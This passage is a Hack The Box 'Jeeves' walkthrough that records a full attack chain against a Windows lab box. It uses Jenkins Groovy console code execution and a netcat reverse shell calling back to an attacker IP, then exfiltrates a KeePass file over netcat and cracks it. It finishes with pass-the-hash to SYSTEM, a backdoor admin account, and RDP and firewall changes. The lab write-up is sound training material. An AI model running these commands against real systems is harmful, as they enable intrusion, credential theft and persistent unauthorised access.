Okay. Now you can go spend the next few days learning how to program in Groovy. Fun! Seriously though, it’s just like Java, but easier. If you can Java, you can Groovy. This looks like a tender spot, so let’s try to get some code execution going. It’s Windows, so keep that in mind when you write out commands.

Groovy has a useful method to execute strings as shell commands called execute(). Let’s use that to see if we can get a directory list.

This took a little tinkering to get right, but we’ve got code execution.

Groovy Console:

def cmd = "cmd.exe /c dir".execute();

println("${cmd.text}");

Result:

Volume in drive C has no label.

Volume Serial Number is BE50-B1C9



Directory of C:\Users\Administrator\.jenkins



05/21/2018 12:42 AM <DIR> .

05/21/2018 12:42 AM <DIR> ..

05/24/2018 05:26 AM 47 .owner

05/21/2018 12:42 AM 1,684 config.xml

05/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml

11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml

11/03/2017 10:33 PM 1,712 identity.key.enc

11/03/2017 10:46 PM 94 jenkins.CLI.xml

05/24/2018 04:54 AM 83,489 jenkins.err.log

11/03/2017 10:47 PM 360,448 jenkins.exe

11/03/2017 10:47 PM 331 jenkins.exe.config

05/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion

11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state

11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml

12/24/2017 03:38 PM 2,688 jenkins.out.log

05/21/2018 12:41 AM 4 jenkins.pid

11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml

11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml

11/03/2017 10:47 PM 74,271,222 jenkins.war

05/21/2018 12:41 AM 34,147 jenkins.wrapper.log

11/03/2017 10:49 PM 2,881 jenkins.xml

11/03/2017 10:33 PM <DIR> jobs

11/03/2017 10:33 PM <DIR> logs

05/21/2018 12:42 AM 907 nodeMonitors.xml

11/03/2017 10:33 PM <DIR> nodes

11/03/2017 10:44 PM <DIR> plugins

11/03/2017 10:47 PM 129 queue.xml.bak

11/03/2017 10:33 PM 64 secret.key

11/03/2017 10:33 PM 0 secret.key.not-so-secret

12/24/2017 03:47 AM <DIR> secrets

11/08/2017 09:52 AM <DIR> updates

11/03/2017 10:33 PM <DIR> userContent

11/03/2017 10:33 PM <DIR> users

11/03/2017 10:47 PM <DIR> war

11/03/2017 10:43 PM <DIR> workflow-libs

23 File(s) 74,760,854 bytes

12 Dir(s) 7,523,225,600 bytes free

Excellent.

Now I’d suggest taking a break. Sitting kills, people. Go make fried chicken or something.

Alright, we’re back from our commercial break.

Let’s get a reverse shell. Apparently Jeeves has PowerShell installed so that makes our job easier. Start up a web server on your local machine and put a copy of an nc.exe binary nearby where you won’t lose it.

Along with netcat, Kali has a bunch of other cool Windows binaries for penetration testing stuff in /usr/share/windows-binaries. Look through it when you get the chance. If you don’t have it on your machine, just find it on the internet. The Windows machine we’re targeting is 32-bit so make sure the binary you use is also 32-bit.

root@kali:~# ls -la /usr/share/windows-binaries/

total 1908

drwxr-xr-x 9 root root 4096 Feb 4 14:39 .

drwxr-xr-x 472 root root 20480 May 21 18:24 ..

drwxr-xr-x 2 root root 4096 Feb 4 14:39 backdoors

drwxr-xr-x 2 root root 4096 Feb 4 14:39 enumplus

-rwxr-xr-x 1 root root 53248 Aug 21 2017 exe2bat.exe

drwxr-xr-x 2 root root 4096 Feb 4 14:39 fgdump

drwxr-xr-x 2 root root 4096 Feb 4 14:39 fport

drwxr-xr-x 5 root root 4096 Feb 4 14:39 hyperion

-rwxr-xr-x 1 root root 23552 Aug 21 2017 klogger.exe

drwxr-xr-x 2 root root 4096 Feb 4 14:39 mbenum

drwxr-xr-x 4 root root 4096 Feb 4 14:39 nbtenum

-rwxr-xr-x 1 root root 59392 Aug 21 2017 nc.exe //YEE

-rwxr-xr-x 1 root root 311296 Aug 21 2017 plink.exe

-rwxr-xr-x 1 root root 704512 Aug 21 2017 radmin.exe

-rwxr-xr-x 1 root root 364544 Aug 21 2017 vncviewer.exe

-rwxr-xr-x 1 root root 308736 Aug 21 2017 wget.exe

-rwxr-xr-x 1 root root 66560 Aug 21 2017 whoami.exe



root@kali:~/Documents/oscp/tools/windows_binaries# python -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...

Most of the time, netcat use is restricted or nonexistent on Windows machines, so it’s far easier to just upload our own and create TCP connections to our heart’s content.

Back to the Groovy script console. Use the Powershell Invoke-WebRequest cmdlet (wget is so much less verbose, jeez) to grab netcat from your local machine.

Groovy Console:

Make sure to write your own IP address connected to the tun0 interface (viewable with ifconfig). We need -OutFile to specify that we want to save the file contents to nc.exe because Invoke-WebRequest outputs them to the pipeline by default. Your Python server should show that Jeeves got our present.

root@kali:~# python -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...

10.10.10.63 - - [24/May/2018 01:07:41] "GET /nc.exe HTTP/1.1" 200 -

List the directory contents again to make sure it’s there. We can keep using PowerShell because we want to avoid the aging travesty that is the Windows command line.

Groovy Console:

def process = "powershell -command dir".execute();

println("${process.text}");

Result:

Directory: C:\Users\Administrator\.jenkins





Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 11/3/2017 10:33 PM jobs

d----- 11/3/2017 10:33 PM logs

d----- 11/3/2017 10:33 PM nodes

d----- 11/3/2017 10:44 PM plugins

d----- 12/24/2017 2:47 AM secrets

d----- 11/8/2017 8:52 AM updates

d----- 11/3/2017 10:33 PM userContent

d----- 11/3/2017 10:33 PM users

d----- 11/3/2017 10:47 PM war

d----- 11/3/2017 10:43 PM workflow-libs

-a---- 5/24/2018 5:26 AM 47 .owner

-a---- 5/21/2018 12:42 AM 1684 config.xml

-a---- 5/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml

-a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml

-a---- 11/3/2017 10:33 PM 1712 identity.key.enc

-a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml

5/24/2018 4:54 AM 83489 jenkins.err.log

-a---- 11/3/2017 10:47 PM 360448 jenkins.exe

-a---- 11/3/2017 10:47 PM 331 jenkins.exe.config

-a---- 5/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion

-a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state

-a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml

12/24/2017 2:38 PM 2688 jenkins.out.log

-a---- 5/21/2018 12:41 AM 4 jenkins.pid

-a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml

-a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml

-a---- 11/3/2017 10:47 PM 74271222 jenkins.war

-a---- 5/21/2018 12:41 AM 34147 jenkins.wrapper.log

-a---- 11/3/2017 10:49 PM 2881 jenkins.xml

-a---- 5/24/2018 6:06 AM 59392 nc.exe

-a---- 5/21/2018 12:42 AM 907 nodeMonitors.xml

-a---- 11/3/2017 10:47 PM 129 queue.xml.bak

-a---- 11/3/2017 10:33 PM 64 secret.key

-a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret

Great. Now let’s set up a netcat listener on our local machine and connect back to it from the script console.

root@kali:~# nc -lnvp 1337

listening on [any] 1337 ...

Groovy Console:

def process = "powershell -command ./nc.exe 10.10.14.5 1337 -e cmd.exe".execute(); //CHANGE IP PLS

println("${process.text}");

Run it and check your listener.

root@kali:~# nc -lnvp 1337

listening on [any] 1337 ...

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49678

Microsoft Windows [Version 10.0.10586]

(c) 2015 Microsoft Corporation. All rights reserved. C:\Users\Administrator\.jenkins>whoami

whoami

jeeves\kohsuke C:\Users\Administrator\.jenkins>

Delicious.

Windows irks me

Start off by invading Kohsuke’s privacy and rifling through his stuff. His Documents folder contains something interesting.

C:\Users\kohsuke\Documents>dir

dir

Volume in drive C has no label.

Volume Serial Number is BE50-B1C9 Directory of C:\Users\kohsuke\Documents 11/03/2017 11:18 PM <DIR> .

11/03/2017 11:18 PM <DIR> ..

09/18/2017 01:43 PM 2,846 CEH.kdbx

1 File(s) 2,846 bytes

2 Dir(s) 7,523,155,968 bytes free C:\Users\kohsuke\Documents>

A quick Google (sigh) search show us that the .kdbx extension is most commonly used as a Keepass Password Database data file. Nice. It’s probably got some interesting credentials in there. Let’s get it onto our system with netcat file transfer witchery.

Set up a listener on your local machine that redirects data to a .kdbx file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx

listening on [any] 4444 ...

Now on the command line for Jeeves, use the uploaded nc.exe to transfer the contents of CEH.kdbx to your machine.

C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins

c.exe 10.10.14.5 4444 < CEH.kdbx

C:\Users\Administrator\.jenkins

c.exe 10.10.14.5 4444 < CEH.kdbx

Your listener should have received the incoming connection. If so, exit netcat and you’ll see the file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx

listening on [any] 4444 ...

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49693

^C

root@kali:~# ls -la CEH.kdbx

-rw-r--r-- 1 root root 2846 May 23 02:08 CEH.kdbx

root@kali:~#

Great. Download KeePass if you don’t already have it.

root@kali:~# apt search keepass

Sorting... Done

Full Text Search... Done

keepass2/kali-rolling 2.38+dfsg-1 all

Password manager keepass2-doc/kali-rolling 2.38+dfsg-1 all

Password manager - Documentation keepassx/kali-rolling,now 2.0.3-1 i386 [installed]

Cross Platform Password Manager keepassxc/kali-rolling 2.3.1+dfsg.1-1 i386

Cross Platform Password Manager kpcli/kali-rolling 3.1-3 all

command line interface to KeePassX password manager databases libfile-keepass-perl/kali-rolling 2.03-1 all

interface to KeePass V1 and V2 database files root@kali:~#apt install keepassx

...

Open the KeePass file.

root@kali:~/Documents/hack_the_box/jeeves# keepassx CEH.kdbx

We shall not pass. We need a password. Let’s smash it.

Luckily Kali saves our asses once again (I laughed when I saw there’s a keepass2john program. I love this).

root@kali:~# keepass2john CEH.kdbx

CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

root@kali:~#

Alright. We now have a hash, and, ignoring the name, we can now use hashcat to crack it. Save the hash to a text file. You’ll notice that the hash is invalid. Check out a list of hash examples to see that KeePass hashes start with $keepass$, and not CEH: (kind of obvious in hindsight). Remove that part. Now actually crack it.

*5 minutes later*

Nvm. It broke my laptop. Pro tip, don’t use the force option when hashcat tells you it’s a bad idea. My Kali Linux partition is no longer booting.

Sigh. Sorry John. I still love you and stuff. Take me back, pls.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt

Using default input encoding: UTF-8

Loaded 1 password hash (KeePass [SHA256 AES 32/32 OpenSSL])

Press 'q' or Ctrl-C to abort, almost any other key for status

moonshine1 (CEH)

1g 0:00:01:37 DONE (2018-05-26 03:38) 0.01027g/s 564.7p/s 564.7c/s 564.7C/s moonshine1

Use the "--show" option to display all of the cracked passwords reliably

Session completed

root@kali:~#

Aaaand the password is moonshine1. Fire up KeePass again and enter the password.

WOOH, got the password to his Walmart account. I kinda needed a few bags of potting soil and 4-ply toilet paper.

Let’s use winexe to try to log in as admin with all these passwords.

The most promising seems like the one under Backup stuff, which looks like a Windows NTLM hash.

For this, we can use pth-winexe to pass in the hash directly to log in. No need to crack it. Scary stuff.

root@kali:~# pth-winexe

winexe version 1.1

This program may be freely redistributed under the terms of the GNU GPLv3

Usage: winexe [OPTION]... //HOST COMMAND

Options:

-h, --help Display help message

-V, --version Display version number

-U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username

-A, --authentication-file=FILE Get the credentials from a file

-N, --no-pass Do not ask for a password

-k, --kerberos=STRING Use Kerberos, -k [yes|no]

-d, --debuglevel=DEBUGLEVEL Set debug level

--uninstall Uninstall winexe service after

remote execution

--reinstall Reinstall winexe service before

remote execution

--system Use SYSTEM account

--profile Load user profile

--convert Try to convert characters

between local and remote

code-pages

--runas=[DOMAIN\]USERNAME%PASSWORD Run as the given user (BEWARE:

this password is sent in

cleartext over the network!)

--runas-file=FILE Run as user options defined in a

file

--interactive=0|1 Desktop interaction: 0 -

disallow, 1 - allow. If allow,

also use the --system switch

(Windows requirement). Vista

does not support this option.

--ostype=0|1|2 OS type: 0 - 32-bit, 1 - 64-bit,

2 - winexe will decide.

Determines which version (32-bit

or 64-bit) of service will be

installed.

root@kali:~# pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

E_md4hash wrapper called.

HASH PASS: Substituting user supplied NTLM HASH...

Microsoft Windows [Version 10.0.10586]

(c) 2015 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami

whoami

nt authority\system <------------ yah C:\Windows\system32>

Successfully hacked. Now let’s grab the flags the fun way. I had no idea this was a thing until I started my OSCP practice. Mind was sufficiently blown.

Through the Jeeves command line, make an account for yourself with admin privileges (Please don’t do this in a real environment. Use already existing accounts if you have to. And opening up a remote desktop port is pretty conspicuous. It’s just more fun this way).

C:\Windows\system32>net user /add oneeb jeeved

net user /add oneeb jeeved

The command completed successfully. C:\Windows\system32>net localgroup administrators oneeb /add

net localgroup administrators oneeb /add

The command completed successfully. C:\Windows\system32>

Now start up the Remote Desktop (RDP) service.

C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

The operation completed successfully. C:\Windows\system32>

Configure the firewall to let RDP connections in.

C:\Windows\system32>netsh firewall set service remoteadmin enable

netsh firewall set service remoteadmin enable Ok. C:\Windows\system32>netsh firewall set service remotedesktop enable

netsh firewall set service remotedesktop enable Ok. C:\Windows\system32>

Now use rdesktop on Kali to log in to your newly minted account.

root@kali:~# rdesktop 10.10.10.63

Connection established using SSL.

Enter your username and password and log in.

The color scheme makes me sad

Tah-dah. Beautiful isn’t it? Play around with it to your heart’s content.

Now go to the admin desktop and grab that flag so I can sleep.

Copy that file to your desktop so you can read it.

Knickers twisted. I’m stumped. Since the root.txt file is always on the Administrator desktop, and there doesn’t seem to be some network inception stuff going on, let’s take a deeper look at the file with PowerShell. Make sure to run it as admin or you're going to have a bad time.

I can use ls again.

Start by taking a look at Alternative Data Streams (ADS). MalwareBytes has a really good basic introduction to it.

Basically ADS is a way for you to add data to a file that’s hidden from normal means of viewing, like through file explorer or printing the file out on a command line. You’ve got to use special directives to view these streams and it’s very easy for them to fly under the radar. They often get a bad rep because so much malware takes advantage of this.

Note that these streams are a feature of the Windows New Technology File System (NTFS), so transferring the file to your Linux system, or even a FAT32 Windows file system will erase any streams the file may have.

Anyway, let’s check to see if hm.txt has any other streams.

Bingo. Read the contents of root.txt.

PS C:\Users\oneeb\Desktop> get-content .\hm.txt -stream root.txt

r00t_ha$h_th1ngi3

PS C:\Users\oneeb\Desktop>

Done.

Just make sure to delete your user account so Jeeves doesn’t axe murder you. Nighty night.